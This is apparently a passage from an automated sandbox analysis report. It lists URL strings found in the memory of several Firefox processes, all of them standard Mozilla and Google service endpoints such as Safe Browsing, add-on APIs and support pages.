Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%
Source: firefox.exe, 00000015.00000002.2944148777.000002594054B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/gethash?client=SAFEBROWSING_ID&appver=118.0&pver=2.2
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=%GOOGLE_SAFEBR
Source: firefox.exe, 00000015.00000002.2936356785.000002593FDCB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A41B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=AIzaSyC7jsptDS
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatHits?$ct=application/x-protobuf&key=%GOOGLE_SAFEBROWSIN
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=%GOOGL
Source: firefox.exe, 00000015.00000002.2936356785.000002593FDCB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A41B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSy
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://sb-ssl.google.com/safebrowsing/clientreport/download?key=%GOOGLE_SAFEBROWSING_API_KEY%
Source: firefox.exe, 00000015.00000002.2879062103.0000025928303000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.00000259358AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3072972441.000001EF2D1F2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3051133453.000001EF29652000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3074810196.000001EF2D5F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com
Source: firefox.exe, 00000015.00000003.2757162605.0000025937E60000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.00000259358D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.0000025934473000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A41B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3085049318.000001EF2E903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3055217724.000001EF29EDA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 00000015.00000002.2884763162.0000025934403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.comError:
Source: firefox.exe, 00000015.00000003.2831553568.00000259412F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://searchfox.org/mozilla-central/source/toolkit/components/search/SearchUtils.jsm#145-152
Source: firefox.exe, 00000015.00000003.2822792525.00000259396EF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2911918698.00000259396A3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A478000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon/
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/language-tools/?app=firefox&type=language&appversi
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/discovery/?lang=%LOCALE%&edition=%DISTRIBUTION%
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%
Source: firefox.exe, 00000015.00000002.2894066055.00000259378FB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2944981005.000002594063F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2816546786.000002594063F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com
Source: firefox.exe, 00000015.00000002.2911918698.0000025939696000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/
Source: firefox.exe, 00000015.00000002.2944148777.000002594054B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=SAFEBROWSING_ID&appver=118.0&pver=2.2
Source: firefox.exe, 00000015.00000002.2924708904.000002593ACB5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2906919520.0000025938EF3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A41B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=navclient-auto-ffox&appver=118.0&pver=2.2
Source: firefox.exe, 00000015.00000002.2917321112.000002593A471000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=navclient-auto-ffox&appver=118.0&pver=2.2http:/
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 00000015.00000002.2944148777.000002594054B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=118.0&pver=2.2
Source: firefox.exe, 00000015.00000002.2884763162.0000025934403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A471000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=navclient-auto-ffox&appver=118.0&pver=2.2
Source: firefox.exe, 00000015.00000002.2917321112.000002593A471000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=navclient-auto-ffox&appver=118.0&pver=2.2http://m
Source: firefox.exe, 00000015.00000002.2884763162.0000025934403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A492000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2915888122.000002593A23A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3086366052.000001EF2EB9E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3055217724.000001EF29E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/facebook.svg
Source: firefox.exe, 00000015.00000002.2884763162.0000025934403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A492000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2915888122.000002593A23A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3086366052.000001EF2EB9E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3055217724.000001EF29E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/play.svg
Source: firefox.exe, 00000015.00000002.2884763162.0000025934403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/play.svgresource://gre/modules/addons/XPIProvider.jsm
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://snippets.cdn.mozilla.net/%STARTPAGE_VERSION%/%NAME%/%VERSION%/%APPBUILDID%/%BUILD_TARGET%/%L
Source: firefox.exe, 00000015.00000003.2805571289.000002593B7C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com
Source: firefox.exe, 00000015.00000002.2940088335.00000259403B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.0000025935803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2805259789.000002593FDE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A41B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2867425093.000001CBE7A12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3066712118.000001EF2C839000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3074810196.000001EF2D5B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/
Source: firefox.exe, 00000015.00000002.2940088335.00000259403B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.0000025935803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2931474157.000002593B747000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A41B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3074810196.000001EF2D5B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs
Source: firefox.exe, 00000015.00000002.2940088335.00000259403B5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs#
Source: firefox.exe, 00000015.00000002.2940088335.00000259403B5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs#l
Source: firefox.exe, 00000015.00000002.2917321112.000002593A481000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs:
Source: firefox.exe, 00000015.00000002.2952417248.000002594244E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2938420212.0000025940103000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.0000025935888000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.0000025935803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A41B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2867425093.000001CBE7ABC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3066712118.000001EF2C839000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3074810196.000001EF2D5B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/user
Source: firefox.exe, 00000015.00000002.2918105959.000002593A51A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.0000025934403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A40F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A492000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3086366052.000001EF2EB9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
Source: firefox.exe, 00000015.00000002.2884763162.0000025934403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-jsC:
Source: firefox.exe, 00000015.00000002.2884763162.0000025934403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A40F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2915888122.000002593A2F7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A492000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2915888122.000002593A2CD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3086366052.000001EF2EB9E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3055217724.000001EF29EEA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3112028417.000001EF30F72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3055217724.000001EF29EDA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: firefox.exe, 00000015.00000002.2879062103.0000025928303000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.00000259358AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3072972441.000001EF2D1F2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3051133453.000001EF29652000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3064689751.000001EF2C544000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3074810196.000001EF2D5F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cryptominers-report
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/firefox-relay-integration
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/password-manager-report
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/send-tab
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/social-media-tracking-report
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/tracking-content-report
Source: firefox.exe, 00000015.00000002.2911918698.00000259396A3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2822792525.00000259396BA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2923113526.000002593AB07000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3105540010.000001EF3024D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/
Source: firefox.exe, 00000015.00000002.2906919520.0000025938E03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/connection-not-secure
Source: firefox.exe, 00000015.00000002.2889978017.000002593585F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.00000259344DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2937149751.000002593FE7F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2906919520.0000025938EF3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3086366052.000001EF2EB9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/captive-portal
Source: firefox.exe, 00000015.00000002.2915569464.000002593A103000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3085049318.000001EF2E98B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3085049318.000001EF2E903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windows
Source: firefox.exe, 00000015.00000002.2919125459.000002593A603000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsMediaPlatformDecoderNotFound
Source: firefox.exe, 00000015.00000002.2919125459.000002593A603000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsMediaWMFNeeded
Source: firefox.exe, 00000015.00000002.2908644373.0000025939040000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsThe
Source: firefox.exe, 00000015.00000002.2908644373.0000025939040000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsUse
Source: firefox.exe, 00000015.00000002.2939307905.000002594022D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3124908460.000001EF35B83000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tc39.github.io/ecma262/#sec-typeof-operator
Source: firefox.exe, 00000015.00000002.2908644373.0000025939040000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3085049318.000001EF2E98B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3085049318.000001EF2E903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-2
Source: firefox.exe, 00000015.00000002.2908644373.0000025939040000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3085049318.000001EF2E98B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3085049318.000001EF2E903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-3.1
Source: firefox.exe, 00000015.00000002.2908644373.0000025939040000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3085049318.000001EF2E98B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3085049318.000001EF2E903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-4
Source: firefox.exe, 00000015.00000002.2908644373.0000025939040000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3085049318.000001EF2E98B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3085049318.000001EF2E903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/rfc7515#appendix-C)
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://topsites.services.mozilla.com/cid/
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://tracking-protection-issues.herokuapp.com/new
Source: firefox.exe, 00000015.00000002.2889978017.00000259358D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.00000259358AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3072972441.000001EF2D1F2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3051133453.000001EF29652000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3074810196.000001EF2D5F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://truecolors.firefox.com
Source: firefox.exe, 00000015.00000002.2964091165.0000370D2CF04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3121604934.000001EF35723000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://twitter.com
Source: firefox.exe, 00000015.00000002.2940088335.00000259403B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2963140351.00001F079B900000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.000002593582E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.0000025935803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2964435246.00003F69D5E04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2906919520.0000025938ED9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3074810196.000001EF2D5B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://twitter.com/
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://versioncheck.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM_ID
Source: firefox.exe, 00000015.00000002.2919695391.000002593A71C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.00000259344DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3066712118.000001EF2C87C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-%CHANNEL%-browser&utm_campaig
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=about-pr
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://webcompat.com/issues/new
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://webextensions.settings.services.mozilla.com/v1
Source: firefox.exe, 00000015.00000002.2884763162.0000025934427000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://webpack.js.org/concepts/mode/)
